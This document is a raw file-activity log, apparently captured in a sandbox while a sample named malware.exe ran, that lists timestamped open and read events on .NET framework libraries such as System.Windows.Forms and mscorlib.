29/2/2020 - 1:45:46.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.434Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.622Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.668Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.715Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.762Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.809Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.856Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.903Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.43Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.231Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.278Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:47.372Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll
29/2/2020 - 1:45:47.512Unknown1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.512Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll
29/2/2020 - 1:45:47.512Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.559Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.606Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.653Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.700Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.747Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.793Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.840Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.887Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:47.981Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.122Unknown1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.122Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.122Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.168Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.231Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.278Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.372Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.418Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.465Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.512Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.559Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.606Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.653Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.700Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.747Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.793Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.840Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.903Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:48.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.43Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.231Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.278Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.372Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.418Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.465Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.512Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.559Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.606Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.653Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.700Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:49.747Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:49.934Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:49.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:50.497Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:50.543Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:50.590Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:50.684Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:50.684Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:50.731Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:50.778Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:50.825Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:50.872Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:50.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:50.965Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:51.59Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:51.59Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:51.106Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:51.153Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:51.200Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:51.247Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.340Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.434Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:51.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:51.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.622Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.668Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.715Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.762Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.809Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.903Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:51.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:51.997Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\VERSION.dll
29/2/2020 - 1:45:51.997Open1480C:\malware.exeC:\VERSION.dll
29/2/2020 - 1:45:51.997Open1480C:\malware.exeC:\Windows\SysWOW64\version.dll
29/2/2020 - 1:45:51.997Open1480C:\malware.exeC:\Windows\SysWOW64\version.dll
29/2/2020 - 1:45:51.997Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:51.997Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:51.997Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:52.43Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:52.43Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:52.43Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:52.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:52.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:52.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:52.231Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:52.278Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:52.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:52.372Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:52.418Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:52.465Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:52.512Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:52.559Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:52.606Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:52.700Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:52.747Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:52.793Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:52.840Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:52.887Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:52.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:52.981Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:53.28Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:53.122Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
